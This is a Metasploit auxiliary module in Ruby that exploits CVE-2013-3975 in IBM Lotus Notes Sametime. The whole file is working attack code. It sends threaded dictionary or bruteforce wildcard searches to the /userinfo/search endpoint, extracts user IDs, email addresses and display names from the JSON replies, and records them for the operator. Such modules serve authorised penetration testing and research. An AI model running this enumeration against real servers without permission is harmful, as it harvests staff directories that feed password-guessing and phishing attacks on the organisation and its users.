metasploit-framework/modules/auxiliary/gather/ibm_sametime_enumerate_user...

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'enumerable'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
'Author' =>
[
'kicks4kittens' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-3975' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 27 2013'
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
])
register_advanced_options(
[
OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]),
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set suffix for each guess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Pause between requests, in seconds', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
end
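# Illustrative usage from msfconsole (a sketch only: the host and dictionary
# path below are placeholders, and the option names are those registered
# above or by the HttpClient mixin):
#
#   set RHOST sametime.example.com
#   set TYPE EMAIL
#   set DICT /path/to/usernames.txt
#   run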
def setup
# setup the desired charset
@charset = []
# setup array to hold user data
@user_data = []
if datastore['DICT'].blank?
# populate charset - lowercase only as search is case insensitive
case datastore['CHARSET']
when "alpha"
("a".."z").each { |alpha| @charset.push(alpha) }
when "num"
("0".."9").each { |num| @charset.push(num) }
when "alphanum"
("a".."z").each { |alpha| @charset.push(alpha) }
("0".."9").each { |num| @charset.push(num) }
end
unless datastore['SpecialChars'].blank?
datastore['SpecialChars'].each_char do |spec|
@charset.push(Rex::Text.uri_encode(spec))
end
end
print_status("Performing Bruteforce attack")
vprint_status("Using CHARSET: [#{@charset.join(",")}]")
else
print_status("Performing dictionary based attack (#{datastore['DICT']})")
end
if datastore['DICT'].blank? and datastore['MAXDEPTH'] > 2
# warn user on long runs
print_status("Depth level #{datastore['MAXDEPTH']} selected... this may take some time!")
end
# create initial test queue and populate
@test_queue = Queue.new
if datastore['DICT'].blank?
@charset.each { |char| @test_queue.push(char) }
else
::File.open(datastore['DICT']).each { |line| @test_queue.push(line.chomp) }
vprint_status("Loaded #{@test_queue.length} values from dictionary")
end
@depth_warning = true
@retries = []
end
def run
print_status("Testing for IBM Lotus Notes Sametime User Enumeration flaw")
# test for expected response code on a non-existent uid/email
if datastore['TYPE'] == "UID"
random_val = Rex::Text.rand_text_alpha(32)
else
random_val = Rex::Text.rand_text_alpha(32) + "@" + Rex::Text.rand_text_alpha(16) + ".com"
end
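# With the default TARGETURI, this check is roughly equivalent to requesting
#   GET /userinfo/search?mode=uid&searchText=<random value>
# (illustrative path/query only); a 200 response with a parseable JSON body
# indicates the vulnerable search endpoint is present.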
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => random_val
}
})
begin
if res.nil?
print_error("Timeout")
return
elsif res.code != 200
print_error("Unexpected response from server (Response code: #{res.code})")
return
elsif JSON.parse(res.body)
# valid JSON response - valid response for check
print_good("Response received, continuing to enumeration phase")
end
rescue JSON::ParserError
print_error("Error parsing JSON: Invalid response from server")
return
end
# start test handler
test_handler
# output results
output_results
end
def test_handler
print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)")
test_length = 1 # initial test length set
until @test_queue.empty?
t = []
nt = datastore['Threads'].to_i
nt = 1 if nt == 0
if @test_queue.length < nt
# avoid spawning more threads than there are entries left in the queue
nt = @test_queue.length
end
begin
1.upto(nt) do
t << framework.threads.spawn("Module(#{self.refname})-#{rhost}", false, @test_queue.shift) do |test_current|
Thread.current.kill if not test_current
# provide feedback to user on current test length
if datastore['DICT'].blank? and test_current.length > test_length
test_length = test_current.length
print_status("Beginning bruteforce test for #{test_length} character strings")
end
res = make_request(test_current)
# if no response was received, re-queue the value once and retry; otherwise check it for user data
if res.nil? and not @retries.include?(test_current)
# attempt test again as the server was too busy to respond
# correctly - error returned
print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"")
@test_queue.push(test_current)
@retries << test_current
if @retries.length == 10
print_error("Excessive number of retries detected (#{@retries.length}), check the TIMING and Threads options")
end
elsif res
# check response for user data
check_response(res, test_current)
end
end
end
t.each {|x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
end
end
end
# make request and return response
def make_request(test_current)
# combine the test string with the PREFIX and SUFFIX options and add the trailing wildcard
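# e.g. with PREFIX 'user', SUFFIX '_adm' (the examples given in the advanced
# options) and a current test value of 'a', the search term becomes 'usera_adm*'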
tstring = datastore['PREFIX'] + test_current + datastore['SUFFIX'] + "*"
# Apply timing information to pause between making requests - not a timeout
if datastore['TIMING'] > 0
Rex::sleep(datastore['TIMING'])
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => tstring
}
})
end
# check the response for valid user information
def check_response(res, test_current)
begin
# check response exists AND that it validates as JSON before proceeding
if res.code.to_i == 200 and not JSON.parse(res.body).blank?
# successful response - extract user data
extract_user(res)
# extend test_queue to search for further data (not if dictionary in use)
extend_queue(test_current) if (datastore['DICT'].blank?)
end
rescue JSON::ParserError
# non-JSON response - server may be overloaded
return
end
end
def extract_user(res)
# extract user data if not already present
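# the body is expected to be a JSON object carrying at least a 'uid' key,
# with optional 'mail' and 'externalName' keys, e.g. (illustrative values):
#   {"uid":"aanderson","mail":"aanderson@example.com","externalName":"A Anderson"}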
begin
userinfo = JSON.parse(res.body)
unless @user_data.flatten.include?(userinfo['uid'])
@user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ]
# print newly discovered users straight to the screen if verbose mode is set
vprint_good("New user found: #{userinfo['uid']}")
report_user(userinfo['uid'])
end
rescue JSON::ParserError
print_error("Error reading JSON string, continuing")
end
end
# extend the test queue if MAXDEPTH value not exceeded
# checks made to ensure duplicates are not created when extending
# process:
#
# when a user is found by searching for 'a', the queue for 'a' is extended,
# as only the first user starting with 'a' is returned (e.g. 'aanderson').
# To find all users the queue must be extended by adding 'aa' through to 'az'
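#
# As a worked example of the worst case (every prefix matching a user): the
# default 'alpha' charset seeds 26 one-character searches, and with MAXDEPTH 2
# each hit can add a further 26 two-character searches, for an upper bound of
# 26 + 26 * 26 = 702 requests before the depth limit stops further extension.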
def extend_queue(test_current)
if test_current.length < datastore['MAXDEPTH']
@charset.each do | char |
@test_queue.push(test_current + char)
end
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep], finishing up current tests")
@depth_warning = false
end
end
def report_user(username)
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => username,
:update => :unique_data
)
end
def output_results
# print output table
user_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"UID",
"Email",
"CommonName"
])
# populate tables
@user_data.each do | line |
user_tbl << [ line[0], line[1], line[2] ]
end
if not user_tbl.to_s.empty?
print_good("#{@user_data.length} users extracted")
print_line(user_tbl.to_s)
else
print_error("No users discovered")
end
end
end